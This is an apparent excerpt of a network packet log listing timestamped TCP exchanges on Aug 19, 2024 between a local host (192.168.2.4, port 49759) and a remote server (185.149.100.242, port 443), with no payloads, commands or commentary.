Aug 19, 2024 09:28:38.696408987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696433067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696460009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.696466923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696487904 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.696599960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696618080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696645975 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.696652889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696671009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.696875095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696901083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696922064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.696928024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.696950912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.697017908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.697036982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.697065115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.697071075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.697088003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.697191954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.697216988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.697237015 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.697264910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.697274923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.697310925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.698285103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.698293924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.698304892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.698416948 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.702995062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.703021049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.703094959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.703120947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.703136921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.703157902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.703246117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.703269958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.703299999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.703306913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.703331947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.703349113 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.704155922 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705003977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705024958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705066919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705079079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705102921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705121994 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705404043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705423117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705476999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705485106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705513954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705826044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705847025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705876112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705882072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.705912113 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.705928087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.706119061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.706140995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.706171036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.706178904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.706202030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.706238985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.726656914 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.731228113 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.754060030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.754105091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.754159927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.754190922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.754205942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.754234076 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.755717039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.755742073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.755776882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.755784988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.755810976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.755824089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.795671940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795712948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795751095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.795759916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795790911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.795800924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795809984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.795815945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795835018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795862913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.795869112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.795887947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.795911074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.797950983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.797981024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798016071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798022985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798060894 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798221111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798259020 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798263073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798270941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798271894 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798332930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798515081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798535109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798571110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798578978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798590899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798618078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798834085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798854113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798886061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798892021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.798918009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.798935890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.846688032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.846724033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.846771955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.846801996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.846821070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.846843004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.848625898 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.848663092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.848695993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.848702908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.848723888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.848738909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.888808966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.888879061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.888911963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.888942003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.888961077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.888967991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.888991117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.889000893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.889018059 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.889041901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.889044046 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.889070988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.889098883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.889126062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891000986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891036034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891088963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891098022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891124010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891150951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891691923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891715050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891772985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891773939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891791105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891813993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891834974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891843081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891860962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891880989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891881943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891905069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891911983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.891933918 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.891966105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.940140963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.940177917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.940351009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.940406084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.940459013 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.941174030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.941195965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.941237926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.941246033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.941279888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.981379986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.981408119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.981488943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.981513023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.981532097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.981554985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.981564045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.981599092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984040022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984061956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984117031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984124899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984158993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984215975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984239101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984267950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984273911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984286070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984349966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984366894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984395981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984405041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984416008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984592915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984616041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984646082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:38.984653950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:38.984673977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.028537989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.032530069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.032591105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.032656908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.032670021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.032722950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.033524036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.033596992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.034003973 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.034146070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.073762894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.073792934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.073924065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.073956966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.073972940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.073998928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.074004889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.074017048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.074039936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.074074030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076057911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076078892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076128960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076134920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076153040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076173067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076366901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076387882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076441050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076447964 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076493979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076621056 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076647997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076683998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076689959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076714039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076731920 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.076940060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076961040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.076996088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.077001095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.077028036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.077039957 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.124943972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.124980927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.125053883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.125089884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.125102997 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.125133991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.126159906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.126183033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.126215935 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.126221895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.126250029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.126276016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.167509079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.167551041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.167664051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.167681932 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.167726040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.168755054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.168782949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.168834925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.168840885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.168860912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.168874025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.168891907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.168893099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.168915987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.168926954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.168963909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169114113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169135094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169167995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169174910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169188976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169212103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169341087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169363022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169395924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169403076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169428110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169445992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169656992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169687033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169724941 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169730902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.169758081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.169774055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.170031071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.217644930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.217677116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.217751980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.217786074 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.217806101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.217832088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.218880892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.218909979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.218960047 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.218966961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.218995094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.219013929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.260035038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.260068893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.260200024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.260234118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.260288000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261156082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261182070 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261234045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261241913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261271954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261286974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261435986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261464119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261499882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261506081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261538982 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261553049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261754036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261774063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261814117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261823893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.261838913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.261862993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.262182951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.262202978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.262243986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.262250900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:39.262269974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.262293100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:39.262504101 CEST	443	49759	185.149.100.242	192.168.2.4
